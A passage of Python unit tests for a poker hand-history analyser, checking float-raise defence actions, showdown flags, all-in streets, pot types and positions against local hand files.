self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__BCC__T__XXX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__BCC__T__XXBFC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__BCF__T__XX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__BCF__T__XBC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__BCF__T__XX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__BCF__T__XBRF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBCC__T__XXX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBCF__T__XX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBCF__T__XBF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBCF__T__XBRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual('call 2bet', tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBFC__T__XX__R__BRF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual('fold', tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBFC__T__XX__R__XBRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBFC__T__XX__R__BF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBFC__T__XX__R__XBF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBCF__T__XX__R__XBF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBCF__T__XX__R__XBRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBCF__T__XX__R__XX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr2r__F__XBC__T__XX__R__XBC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr2r__F__XBC__T__XX__R__BRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual('call 2bet', tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr2r__F__XBC__T__XBC__R__XX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
class TestHandGeneral(unittest.TestCase):
def test_sd(self):
# folder where are correct anserws
folder = 'E:/sfera/poker/czytanie_akcji/testy/hand/'
file = 'sd.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(True, tmp.sd(), msg=file)
file = 'f.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(False, tmp.sd(), msg=file)
def test_sf(self):
# folder where are correct anserws
folder = 'E:/sfera/poker/czytanie_akcji/testy/hand/'
file = 'sd.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(True, tmp.sf(), msg=file)
file = 'f.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(True, tmp.sf(), msg=file)
file = 'p.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(False, tmp.sf(), msg=file)
def test_st(self):
# folder where are correct anserws
folder = 'E:/sfera/poker/czytanie_akcji/testy/hand/'
file = 'sd.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(True, tmp.st(), msg=file)
file = 'f.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(False, tmp.st(), msg=file)
file = 'p.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(False, tmp.st(), msg=file)
def test_sr(self):
# folder where are correct anserws
folder = 'E:/sfera/poker/czytanie_akcji/testy/hand/'
file = 'sd.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(True, tmp.sr(), msg=file)
file = 'f.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(False, tmp.sr(), msg=file)
file = 'p.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(False, tmp.sr(), msg=file)
def test_ai(self):
# folder where are correct anserws
folder = 'E:/sfera/poker/czytanie_akcji/testy/hand/'
file = 'p-ai sd.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual('PREFLOP', tmp.ai(), msg=file)
file = 'p-ai nosd.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(None, tmp.ai(), msg=file)
file = 'f-ai sd.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual('FLOP', tmp.ai(), msg=file)
file = 'f-ai nosd.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(None, tmp.ai(), msg=file)
file = 't-ai sd.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual('TURN', tmp.ai(), msg=file)
file = 't-ai nosd.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(None, tmp.ai(), msg=file)
file = 'r-ai sd.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual('RIVER', tmp.ai(), msg=file)
file = 'r-ai nosd.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(None, tmp.ai(), msg=file)
def test_pot_2bet(self):
# folder where are correct anserws
folder = 'E:/sfera/poker/czytanie_akcji/testy/hand/'
file = 't.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(False, tmp.pot_2bet(), msg=file)
file = 'sd.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(True, tmp.pot_2bet(), msg=file)
file = '4b.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(False, tmp.pot_2bet(), msg=file)
def test_pot_3bet(self):
# folder where are correct anserws
folder = 'E:/sfera/poker/czytanie_akcji/testy/hand/'
file = 't.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(False, tmp.pot_3bet(), msg=file)
file = 'sd.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(False, tmp.pot_3bet(), msg=file)
file = 't-ai nosd.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(True, tmp.pot_3bet(), msg=file)
file = '4b.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(False, tmp.pot_3bet(), msg=file)
def test_pot_4bet(self):
# folder where are correct anserws
folder = 'E:/sfera/poker/czytanie_akcji/testy/hand/'
file = 't.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(False, tmp.pot_4bet(), msg=file)
file = 't-ai nosd.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(False, tmp.pot_4bet(), msg=file)
file = '4b.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(True, tmp.pot_4bet(), msg=file)
file = '5b.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(False, tmp.pot_4bet(), msg=file)
def test_pot_5bet_plus(self):
# folder where are correct anserws
folder = 'E:/sfera/poker/czytanie_akcji/testy/hand/'
file = 't.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(False, tmp.pot_5bet_plus(), msg=file)
file = '4b.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(False, tmp.pot_5bet_plus(), msg=file)
file = '5b.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(True, tmp.pot_5bet_plus(), msg=file)
file = '6b.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(True, tmp.pot_5bet_plus(), msg=file)
def test_open_pos_nr(self):
# folder where are correct anserws
folder = 'E:/sfera/poker/czytanie_akcji/testy/hand/'
file = 't.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(-1, tmp.open_pos_nr(), msg=file)
file = 'sd.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(1, tmp.open_pos_nr(), msg=file)
file = 't-ai nosd.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(4, tmp.open_pos_nr(), msg=file)
file = 'izo.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(4, tmp.open_pos_nr(), msg=file)
def test_three_bet_pos_nr(self):
# folder where are correct anserws
folder = 'E:/sfera/poker/czytanie_akcji/testy/hand/'
file = 't.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(-1, tmp.three_bet_pos_nr(), msg=file)
file = 'sd.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
self.assertEqual(-1, tmp.three_bet_pos_nr(), msg=file)
file = 't-ai nosd.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
tmp = HandGeneral(hand)
